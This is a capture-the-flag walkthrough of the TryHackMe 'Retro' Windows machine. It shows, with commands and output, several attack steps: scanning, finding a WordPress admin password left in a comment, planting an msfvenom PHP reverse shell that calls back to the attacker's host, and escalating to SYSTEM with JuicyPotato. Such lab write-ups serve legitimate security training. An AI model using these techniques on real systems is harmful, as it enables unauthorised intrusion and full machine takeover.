Retro is a free Windows box offered .
What you’ll learn
- Importance of different wordlists
- Consequence of SeImpersonatePrivilege
Port scans
One thing I noticed with is that the openvpn tunnel created is a tun0 interface, rather than tap0 or the hypervisor-created eth0. This poses some problems for Unicornscan which seems to work over a network-L2 interface but not a L3 one. This was discussed in a HTB thread here. Unicornscan gave the error
Send exiting main didnt connect, exiting: system error Interrupted system call
Consequently I stuck with masscan, which worked for TCP scans. UDP scans, well are protocol-based and don’t seem to work for most scanners, including nmap (see here for an open TFTP port nmap didn’t detect). nmap is probably your best chance though.
root@Kali:~/TryHackme/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0 Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-28 13:32:10 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.208.198 Discovered open port 3389/tcp on 10.10.208.198
Just two ports. Perfect. TCP service scan here. There seems to be nothing special though, from the nmap results.
Web scans
This seemed to return nothing too.
amap v5.4 (www.thc.org/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode Protocol on 10.10.208.198:80/tcp matches http Protocol on 10.10.208.198:80/tcp matches http-apache-2 Protocol on 10.10.208.198:80/tcp matches http-iis Unidentified ports: none. amap v5.4 finished at 2020-03-28 21:54:36 root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.208.198:80 [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/28 21:55:16 Starting gobuster =============================================================== =============================================================== 2020/03/28 21:56:47 Finished =============================================================== Routed through Burp, use old header User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt -p http://localhost:8081 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.208.198:80 [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] Proxy: http://localhost:8081 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/28 22:04:01 Starting gobuster =============================================================== =============================================================== 2020/03/28 22:08:03 Finished ===============================================================
Took me some time, but apparently the wordlist used I used was insufficient. If I had used /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt instead I would have found this.
root@Kali:~/TryHackme/Retro# gobuster dir -u http://192.168.92.134:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.218.121:80 [+] Threads: 10 [+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/29 14:57:25 Starting gobuster =============================================================== /retro (Status: 301) /Retro (Status: 301) =============================================================== 2020/03/29 14:57:43 Finished ===============================================================
That or got the hint somehow that the name of the box could be an important Web path. Further scanning down this path gave
root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.121:80/retro -w /usr/share/dirb/wordlists/common.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.208.121:80/retro [+] Threads: 10 [+] Wordlist: /usr/share/dirb/wordlists/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/03/28 22:15:06 Starting gobuster =============================================================== /index.php (Status: 301) /wp-admin (Status: 301) /wp-content (Status: 301) /wp-includes (Status: 301) =============================================================== 2020/03/28 22:16:39 Finished ===============================================================
So we have a WP blog. But for some reason with Burp as proxy I kept getting re-directed to localhost:80 which of course loaded nothing so I had to do this to redirect it back.
root@Kali:~/TryHackme/Retro# ssh -L 80:10.10.208.121:80 localhost root@localhost's password: Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64 The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Sat Mar 28 20:35:25 2020 from ::1
That’s SSH local port forwarding where you connect one of your machine own ports to a remote servers’ other port, like
ssh -L 8080:www.ubuntuforums.org:80 localhost
Now you can visit http://localhost:8080 to go to http://www.ubuntuforums.org:80
After doing this I could visit http://10.10.208.121/retro/wp-admin. If you didn’t encounter this problem don’t do this. After I upgraded Burpsuite, the problem stopped. The site looks like this
Now I had to specify all my scans to direct to localhost:80 Since we have a WP site I did wpscan, which annoyingly upgraded to a freemium model limited to 5 results per day. Results here. This didn’t lead anywhere since the vulnerabilities identified were XSS or required you already had some login access to the WP site.
WordPress login
The only way forward, was to notice this comment.
which said
Wade December 9, 2019 Leaving myself a note here just in case I forget how to spell it: parzival
If you try it on the WordPress admin login page (/retro/wp-login.php) it works (user: Wade, Password = parzival)
Exploitation
Checking the Users section, we see quickly that Wade is a WP admin. Great.
That means we have rights to edit WP themes and replace it with our own code. Typically the WordPress exploitation to shell vector requres two things.
- Uploading a reverse Web shell.
- LFI or able to browse to view that shell.
The theme used is 90’s retro. Going to Apperance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php since that page loads whenever a non-existent Web page is queried on the WP site and it gets redirected there, triggering the reverse shell. But this time, I chose another page, page.php.
Now we just need a PHP reverse shell, so get it via msfvenom.
root@Kali:~/TryHackme/Retro# msfvenom -a php --platform php -p php/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php No encoder or badchars specified, outputting raw payload Payload size: 3044 bytes Saved as: shell.php
Just copy and paste the entire PHP code, overwriting the existing code completely. Don’t leave any of the original code behind. I say this because when I first did it, I couldn’t get the reverse shell to trigger until I completely overwrote it. Ok, now we just need to find a way to view page.php Where could that be?
Now I could access twentynineteen theme readme.txt here
http://10.10.218.121/retro/wp-content/themes/twentynineteen/readme.txt
so I just need to figure out Web path for 90’s Retro theme. After some Googling, I found its Github repo. The URL suggested the path could be /90s-retro/. Accessing http://10.10.218.121/retro/wp-content/themes/90s-retro/readme.txt works! So the uploaded reverse shell would be at http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php
root@Kali:~/TryHackme/Retro# curl http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php
Our listener (I switched from port 53 to 443 with another shell)
root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344
whoami && ipconfig /all
nt authority\iusr
Windows IP Configuration
Host Name . . . . . . . . . . . . : RetroWeb
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
eu-west-1.compute.internal
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : eu-west-1.compute.internal
Description . . . . . . . . . . . : AWS PV Network Device #0
Physical Address. . . . . . . . . : 02-95-6F-53-23-2E
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred)
IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM
Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM
Default Gateway . . . . . . . . . : 10.10.0.1
DHCP Server . . . . . . . . . . . : 10.10.0.1
DHCPv6 IAID . . . . . . . . . . . : 100805359
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
DNS Servers . . . . . . . . . . . : 10.0.0.2
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred)
Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred)
Default Gateway . . . . . . . . . : ::
DHCPv6 IAID . . . . . . . . . . . : 134217728
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
NetBIOS over Tcpip. . . . . . . . : Disabled
Tunnel adapter isatap.eu-west-1.compute.internal:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : eu-west-1.compute.internal
Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you’re going down that route, I prefer FreeRDP over rdesktop. This command is my go to
root@Kali:~/TryHackme/Retro# xfreerdp /v:10.10.218.121:3389 /u:Wade /p:parzival /size:90%
Where /size scales it to 90% of your desktop resolution. Experiment and see what works for you. Just for the record, I tried other PHP reverse shells such as this and Pentestmonkey’s (replacing with cmd) but it didn’t work. Only msfvenom’s worked for me.
Post-exploitation
There are a few ways to achieve SYSTEM here. The intended method, explained here didn’t work for me. What worked was a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First note our privileges (we are IUSR or the IIS user). winPEAS highlights this too.
whoami /all USER INFORMATION ---------------- User Name SID ================= ======== nt authority\iusr S-1-5-17 GROUP INFORMATION ----------------- Group Name Type SID Attributes ==================================== ================ ============ ================================================== Mandatory Label\High Mandatory Level Label S-1-16-12288 Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled
We have SeImpersonatePrivilege privileges. So that means we can use Juicy Potato. Call it like this
JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
We should get a SYSTEM shell
root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443 listening on [any] 443 ... connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami /priv && ipconfig whoami /priv && ipconfig PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ========================================= ================================================================== ======= SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled Windows IP Configuration Ethernet adapter Ethernet: Connection-specific DNS Suffix . : eu-west-1.compute.internal Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5 IPv4 Address. . . . . . . . . . . : 10.10.218.121 Subnet Mask . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . : 10.10.0.1 Tunnel adapter Teredo Tunneling Pseudo-Interface: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586 Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2 Default Gateway . . . . . . . . . : :: Tunnel adapter isatap.eu-west-1.compute.internal: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : eu-west-1.compute.internal
未经允许不得转载:萌萌guo angline - Apprentissage » Retro for CTF of wordpress
Pixel art ( 5 )
learn NMAP
